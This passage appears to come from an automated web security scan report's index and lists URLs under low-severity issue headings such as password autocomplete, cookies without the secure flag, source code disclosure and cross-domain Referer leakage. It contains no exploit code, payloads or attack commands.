11.24. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc873419440ef867fa5712fc8cd9d589f6acaa54857770a79f59f4618f43dadef23cadec93964ed4b1e92d4a0d2076ce9ef36df78c97dfc78977bd6191d8ced1c3fb5760e1e47e4a45c795f13d92fda6a31a2c06cbc8a0c8e2a660ebbf5d623b135ad8ab210b8c645d4f6137873627d59f7fba294317baec039dc250131ca3fbe973a9a77984547c4816041b9c62
11.25. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc8734195e13e473e5477f80fae3f4f889c7a853856a70bf995a8208e85de0f4cf1d9dccbaa929d2fcbc646e010a6083c1be46d0eb909292c053b14b8795919ce8dc3067b1bb3d7345cb89da2f89fef0a17b13309a9ef385b98035afeb4a79786d398dba2f4f8e65081d313780362dd1cd7eef7b4646eaea4084d0667e77d299cb65a1b72184547c481603bc57d1
11.26. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b682e0afe92d849a36d77c696f9b02f52213c7753c022c538b
11.27. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b782e0af9f4bfcef26c36e0336dd479c6658e55070b5e4b7bde575cc77e590f867a08763d726c3f654ef95915adab36bfc3316044cd6a98a351cdbc765154dd94cf8f96bd3f0e1a3d64c41d4f8322d882278fbdb09384558fc8f7582dc8dbd36862f1a683879d69ad104caddc45b33a22e2e65f1675c77ef961b91a2d167b7f57993dfcd8fec5580d8231a393458d620142e94f6f269a51b2aa34877aff62cfa6133e8200a75b3497c79770b83465fb0385d11479666fda58cb46d32ac54e7e9a04334e25d15d5a9f7a264df2eda17fe91dc4ecc20e963d77951256af5214019cd6f611bf6b23eb9fb9dbd561721adf984763f4077d2bc84b0af0863f60defc331fd636c7927438ad26c6eccb308df66a0d1ff243efc1c698559510e214e23fff01516a58fa093338256ef38c5ea138596a112dcf552fbdefe2c4c1b436894db29d0a47cb09fd3488ccf12068f54fd24f588e29247b90d39b9d40132105bfee5a360f21b757e3a35367cfcc6f186dd15e972e41ee4e67941aa4e0eaa87b73507fd1f492b52d1234a3ce2cb4ff772f0c6bd0b16908f0b05cc4d1dfe10af9dba1043711677a48995b7a7d4a23a82dd4ea3fc9b260d4ea826e1c6325fc2a6c2e650583a9609804e70e8a5f716dd338e0bf6ae34cfbe7ebfdf8022cfe474f0fe21af4665e3a79e8ae91db569886db8420c19b2b30c2c1c63732f18b5ed18ef28279ec4ddb637afa8431bc274021742b572a14459d6f4b2e6ab6bfe07ca81960925b4263fcc363fe34c668a7883928025527d972ea2aea9ee854450bf5dbb737684cdd0bfdff903b77bdf72807f567c8d872286509dc6c75890d0b6496e3c401d1b0c2d45ab809ad65f96ba39fdb3a07f033a3b7a4a8bc0316967129582a418440a76875c4ab6bd836c845d108009fecceeb27304b13a1272ce9369ce22c1ae722745a9ae1e0d72ed09f77e9d7b1d1778919ed76173b2b2d76d12d473afb223296c6aa0782f732a41e55e5f21455ac780dfbfdaa74baa54913b096350a2a2538da9bce11ccd5c0770d0f1e32750022f9fa403efc055eaa17044cf2b5dc5c9e13fd24a4120d6805860500f835dc7a2f217ebee6d8f3fc044f00e1603fa4f3555e30ff220bbc4a3ac566017df870717fbc4f692a62b5f5b2f12782aa5ca41a897a702d618dfd102d095794e620edbafe46c12f90e58c93131cda5f4d64fbda184b517cada3714df33af2a363f3856e5b59a5c3b8b99bdfc722c40d2c3b52d6e5c14daf9868257d58bda654d169283155b199ebb7094b7239f0f6613d37ba427343eb1d3b62c6f04c10e99b3e8129391e77c83be93f727fa5ff3a245056473e3
11.28. http://pixel.everesttech.net/2368/gr
11.29. http://pixel1350.everesttech.net/1350/p
11.30. http://t.mookie1.com/t/v1/imp
11.31. http://wow.curse.com/user/NetworkCookie/ajaxSession.aspx
11.32. http://www.pages05.net/WTS/event.jpeg
11.33. http://www.seashepherd.org/
11.34. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
11.35. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp
11.36. http://204.124.80.52/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif
11.37. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911
11.38. http://a.netmng.com/hic/
11.39. http://a.tribalfusion.com/j.ad
11.40. http://a1.interclick.com/ColDta.aspx
11.41. http://a1.interclick.com/getInPageJSProcess.aspx
11.42. http://ad.turn.com/server/ads.js
11.43. http://ad.turn.com/server/pixel.htm
11.44. http://ad.yieldmanager.com/pixel
11.45. http://ad.yieldmanager.com/unpixel
11.46. http://ads.adap.tv/beacons
11.47. http://ads.adap.tv/cookie
11.48. http://ads.pointroll.com/PortalServe/
11.49. http://ads.undertone.com/f
11.50. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH
11.51. http://ak1.abmr.net/is/a.collective-media.net
11.52. http://ak1.abmr.net/is/showadsak.pubmatic.com
11.53. http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php
11.54. http://amch.questionmarket.com/adsc/d922005/24/42823584/decide.php
11.55. http://amch.questionmarket.com/adsc/d922005/24/42823586/decide.php
11.56. http://amch.questionmarket.com/adsc/d922005/24/42825515/decide.php
11.57. http://amch.questionmarket.com/adsc/d922005/24/42825637/decide.php
11.58. http://ap.lijit.com/www/delivery/retarget.php
11.59. http://api.bizographics.com/v1/profile.json
11.60. http://api.bizographics.com/v1/profile.redirect
11.61. http://apr.lijit.com///www/delivery/ajs.php
11.62. http://ar.atwola.com/atd
11.63. http://ar.voicefive.com/bmx3/broker.pli
11.64. http://articleonepartners.app7.hubspot.com/salog.js.aspx
11.65. http://at.amgdgt.com/ads/
11.66. http://b.scorecardresearch.com/b
11.67. http://b.scorecardresearch.com/p
11.68. http://b.scorecardresearch.com/r
11.69. http://b.voicefive.com/b
11.70. http://bcp.crwdcntrl.net/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr
11.71. http://bh.contextweb.com/bh/getuid
11.72. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard
11.73. http://bs.serving-sys.com/BurstingPipe/adServer.bs
11.74. http://c.atdmt.com/c.gif
11.75. http://c.bing.com/c.gif
11.76. http://c.live.com/c.gif
11.77. http://ce.lijit.com/merge
11.78. http://cf.addthis.com/red/p.json
11.79. http://clients.mobilecause.com/lists/1227/subscriptions/web.js
11.80. http://clk.atdmt.com/goiframe/222276744/331989646/direct
11.81. http://clk.atdmt.com/goiframe/223672189/334126009/direct
11.82. http://cms.quantserve.com/dpixel
11.83. http://code.msdn.microsoft.com/
11.84. http://code.msdn.microsoft.com/globalresources/scripts/ms2.js
11.85. http://code.msdn.microsoft.com/site/upload
11.86. http://community.spiceworks.com/r/595
11.87. http://content.mkt51.net/lp/static/js/iMAWebCookie.js
11.88. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
11.89. http://cspix.media6degrees.com/orbserv/hbpix
11.90. http://d.101m3.com/afr.php
11.91. http://d.101m3.com/lg.php
11.92. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/
11.93. http://forums.vostu.com/
11.94. http://forums.vostu.com/forums/41-Como-Jogar
11.95. http://greatpondsma.org/
11.96. http://home.live.com/search
11.97. http://home.live.com/search/
11.98. http://home.live.com/search/hip
11.99. http://i.w55c.net/ping_match.gif
11.100. http://idcs.interclick.com/Segment.aspx
11.101. http://image2.pubmatic.com/AdServer/Pug
11.102. http://image2.pubmatic.com/AdServer/Pug
11.103. http://image2.pubmatic.com/AdServer/Pug
11.104. http://images.apple.com/global/metrics/js/s_code_h.js
11.105. http://images.apple.com/global/nav/scripts/globalnav.js
11.106. http://images.apple.com/global/nav/styles/navigation.css
11.107. http://images.apple.com/global/scripts/apple_core.js
11.108. http://images.apple.com/global/scripts/browserdetect.js
11.109. http://images.apple.com/global/scripts/content_swap.js
11.110. http://images.apple.com/global/scripts/lib/event_mixins.js
11.111. http://images.apple.com/global/scripts/lib/prototype.js
11.112. http://images.apple.com/global/scripts/lib/scriptaculous.js
11.113. http://images.apple.com/global/scripts/overlay_panel.js
11.114. http://images.apple.com/global/scripts/promomanager.js
11.115. http://images.apple.com/global/scripts/search_decorator.js
11.116. http://images.apple.com/global/scripts/swap_view.js
11.117. http://images.apple.com/global/scripts/view_master_tracker.js
11.118. http://images.apple.com/global/styles/base.css
11.119. http://images.apple.com/macpro/scripts/pagenav.js
11.120. http://images.apple.com/macpro/scripts/performance.js
11.121. http://images.apple.com/metrics/scripts/s_code_h.js
11.122. http://images.apple.com/support/css/base_new.css
11.123. http://images.apple.com/support/css/global/nav/navigation.css
11.124. http://images.apple.com/support/css/suggest2.css
11.125. http://images.apple.com/support/css/support.css
11.126. http://images.apple.com/support/home/css/home2011.css
11.127. http://images.apple.com/support/iknow/scripts/ACQuicklinks2.js
11.128. http://images.apple.com/support/iknow/scripts/ACShortcuts.js
11.129. http://images.apple.com/support/scripts/AppleCareWeb/Modules/ExpressLane.js
11.130. http://images.apple.com/support/scripts/SCReporting.js
11.131. http://images.apple.com/support/scripts/module_decorator.js
11.132. http://images.apple.com/support/scripts/new_country.js
11.133. http://images.apple.com/support/scripts/new_support_coverage/cookies.js
11.134. http://images.apple.com/support/scripts/new_support_coverage/en_strings.js
11.135. http://images.apple.com/support/scripts/new_support_coverage/functions.js
11.136. http://images.apple.com/support/scripts/psp_geos.js
11.137. http://images.apple.com/support/scripts/support.global.js
11.138. http://images.apple.com/support/scripts/warranty_check/warrantykeys.js
11.139. http://images.apple.com/support/scripts/warranty_check/warrantypsp.js
11.140. http://js.revsci.net/gateway/gw.js
11.141. http://leadback.advertising.com/adcedge/lb
11.142. http://legolas.nexac.com/lgalt
11.143. http://lifescript.us.intellitxt.com/intellitxt/front.asp
11.144. http://lm.trafficmp.com/clicksense/epic
11.145. http://load.exelator.com/load/
11.146. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t%20/dcs.gif
11.147. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif
11.148. http://m.webtrends.com/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif
11.149. http://m.webtrends.com/dcso6p7z7100004j151amwxpo_5q2j/dcs.gif
11.150. http://media.fastclick.net/w/get.media
11.151. http://media.trafficmp.com/a/js
11.152. http://media.trafficmp.com/a/js
11.153. http://msdn.microsoft.com/magazine/ee336135.aspx
11.154. http://mssto.112.2o7.net/b/ss/msstoerrors/1/H.20.2--NS/0
11.155. http://odb.outbrain.com/utils/get
11.156. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx
11.157. http://p.brilig.com/contact/bct
11.158. http://pix04.revsci.net/A11149/a4/0/0/123.302
11.159. http://pix04.revsci.net/D08734/a1/0/3/0.js
11.160. http://pix04.revsci.net/G07608/a4/0/0/pcx.js
11.161. http://pix04.revsci.net/J08778/b3/0/3/1008211/347187000.js
11.162. http://pix04.revsci.net/J08778/b3/0/3/1008211/435975349.js
11.163. http://pix04.revsci.net/J08778/b3/0/3/1008211/674742100.js
11.164. http://pixel.33across.com/ps/
11.165. http://pixel.quantserve.com/pixel
11.166. http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif
11.167. http://poweredby.kosmix.com/external/ads/kinsert/kosmixCL.js
11.168. http://profile.live.com/Handlers/Plt.mvc
11.169. http://profile.live.com/favicon.ico
11.170. http://r.openx.net/set
11.171. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252
11.172. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/
11.173. http://rd.apmebf.com/w/get.media
11.174. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233
11.175. http://rs.gwallet.com/r1/pixel/x960r=772053252
11.176. http://rt.legolas-media.com/lgrt
11.177. http://sales.liveperson.net/hc/54909046/
11.178. http://sales.liveperson.net/hc/54909046/
11.179. http://segment-pixel.invitemedia.com/pixel
11.180. http://segment-pixel.invitemedia.com/set_partner_uid
11.181. http://segments.adap.tv/data
11.182. http://segments.adap.tv/data/
11.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.184. http://sitelife.boston.com/ver1.0/Direct/Jsonp
11.185. http://sm6.sitemeter.com/js/counter.asp
11.186. http://social.msdn.microsoft.com/Search/en-US
11.187. http://social.msdn.microsoft.com/search/en-US/en-USebb6e
11.188. http://sourceforge.net/projects/hoytllc-vcloud/
11.189. http://sync.adap.tv/sync
11.190. http://sync.mathtag.com/sync/img
11.191. http://t4.trackalyzer.com/trackalyze.asp
11.192. http://tags.bluekai.com/ids
11.193. http://tags.bluekai.com/site/2731
11.194. http://tags.bluekai.com/site/2751
11.195. http://tags.bluekai.com/site/365
11.196. http://trk.etrigue.com/track.php
11.197. http://uat.netmng.com/pixel/
11.198. http://user.lucidmedia.com/clicksense/user
11.199. http://user.lucidmedia.com/clicksense/user/browser
11.200. http://vap2den1.lijit.com/www/delivery/lg.php
11.201. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
11.202. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description
11.203. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView
11.204. http://visualstudiogallery.msdn.microsoft.com/globalresources/scripts/ms2.js
11.205. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula
11.206. http://visualstudiogallery.msdn.microsoft.com/site/favorites
11.207. http://visualstudiogallery.msdn.microsoft.com/site/search
11.208. http://web2.checkm8.com/adam/detect
11.209. http://web2.checkm8.com/adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949
11.210. http://wow.curse.com/Themes/Common/v6/images/loading.gif
11.211. http://wow.curse.com/Themes/Common/v6/images/wow/bkg-box-label.png
11.212. http://wow.curse.com/Themes/Common/v6/styles/portals/wow.css
11.213. http://wow.curse.com/Themes/Curse-Wow/Styles/theme.css
11.214. http://wow.curse.com/Themes/Curse-Wow/Styles/theme.css.aspx
11.215. http://wow.curse.com/WebResource.axd
11.216. http://wow.curse.com/adserver/default.aspx
11.217. http://wow.curse.com/themes/common/v6/styles/browser/ie7.css
11.218. http://www.bing.com/fd/ls/l
11.219. http://www.bing.com/search
11.220. http://www.burstnet.com/enlightn/8117//3E06/
11.221. http://www.burstnet.com/enlightn/8171//99D2/
11.222. http://www.capitalone.com/autoloans/before-you-apply.php
11.223. http://www.capitalone.com/autoloans/redirect.php
11.224. http://www.capitalone.com/directbanking/
11.225. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/
11.226. http://www.capitalone.com/redirect.php
11.227. http://www.capitalone.com/stylesheets/https-common/header.css
11.228. http://www.kosmix.com/flash/kxcd2.swf
11.229. http://www.observer.com/
11.230. http://www.othersonline.com/partner/scripts/myyearbook/alice.js
11.231. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js
11.232. http://www.righthealth.com/contextlinks/lifescript.com/cl.js
11.233. http://www.righthealth.com/external/ads/clo.gif
11.234. http://www.silverlight.net/getting-started
11.235. http://www.socialirl.com/storage/Social-IRL-Logofor-Squares.gif
11.236. http://www.uscg.mil/global/img/primary_uscg.jpg
11.237. http://www.walmartlabs.com/
11.238. http://www.wtp101.com/pull_sync
12. Password field with autocomplete enabled
12.1. https://acn-members.apple.com/mo_login/login.lasso
12.2. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
12.3. http://forums.vostu.com/
12.4. http://forums.vostu.com/forums/41-Como-Jogar
12.5. http://static.curse.com/themes/common/v6/scripts/core.js
12.6. https://towernet.capitalonebank.com/loginpage.html
12.7. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/
12.8. https://www.google.com/accounts/ServiceLogin
13. Source code disclosure
13.1. http://a.fsdn.com/con/js/min/sf.js
13.2. http://cache.boston.com/universal/js/underscore-min-1.1.6.js
13.3. http://cache.boston.com/universal/newsprojects/widgets/slider/slider.js
13.4. http://consultants-locator.apple.com/javascript/portal.1309219793.js
13.5. http://i1.social.s-msft.com/Search/scriptloader.js
13.6. http://secure.adnxs.com/seg
13.7. http://www.lifescript.com/JavaScript/Tracking/EfficientFrontier.js
13.8. http://www.microsoft.com/en-us/security_essentials/shared/templates/components/oneMscomBlade/oneMscomBlade.css
14. ASP.NET debugging enabled
15. Referer-dependent response
15.1. http://lifescript.us.intellitxt.com/intellitxt/front.asp
15.2. http://www.facebook.com/plugins/like.php
15.3. http://www.facebook.com/plugins/likebox.php
16. Cross-domain POST
16.1. http://corp.klout.com/contact
16.2. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/
16.3. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/
16.4. http://www.treehugger.com/daylife/related/72065.html
16.5. http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
16.6. http://www.treehugger.com/galleries/
16.7. http://www.treehugger.com/science_technology/
16.8. http://www.treehugger.com/travel_nature/
17. SSL cookie without secure flag set
17.1. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx
17.2. https://servicing.capitalone.com/c1/login.aspx
18. Cross-domain Referer leakage
18.1. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911
18.2. http://a.fsdn.com/con/css/sf.min.css
18.3. http://a.fsdn.com/con/js/min/sf.js
18.4. http://a.netmng.com/hic/
18.5. http://a.netmng.com/hic/
18.6. http://a.rad.msn.com/ADSAdClient31.dll
18.7. http://a.rad.msn.com/ADSAdClient31.dll
18.8. http://a.rad.msn.com/ADSAdClient31.dll
18.9. http://a.tribalfusion.com/j.ad
18.10. http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3
18.11. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225
18.12. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2
18.13. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3
18.14. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3
18.15. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33
18.16. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10
18.17. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11
18.18. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12
18.19. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16
18.20. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17
18.21. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel
18.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story
18.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story
18.24. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story
18.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story
18.26. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18
18.27. http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911
18.28. http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911
18.29. http://ad.doubleclick.net/adj/interactive.wsj.com/markets_story
18.30. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions
18.31. http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr
18.32. http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr
18.33. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text
18.34. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec
18.35. http://ad.doubleclick.net/adj/scmag.hmktus/sc
18.36. http://ad.doubleclick.net/adj/scmag.hmktus/sc
18.37. http://ad.doubleclick.net/adj/scmag.hmktus/sc
18.38. http://ad.yieldmanager.com/pixel
18.39. http://ads.pointroll.com/PortalServe/
18.40. http://ads.pointroll.com/PortalServe/
18.41. http://ads.pointroll.com/PortalServe/
18.42. http://adserver.adtechus.com/addyn/3.0/5259.1/1248404/0/225/ADTECH
18.43. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
18.44. http://assets.mybcdna.com/JavaScript/apps/site.js
18.45. http://assets.tumblr.com/iframe.html
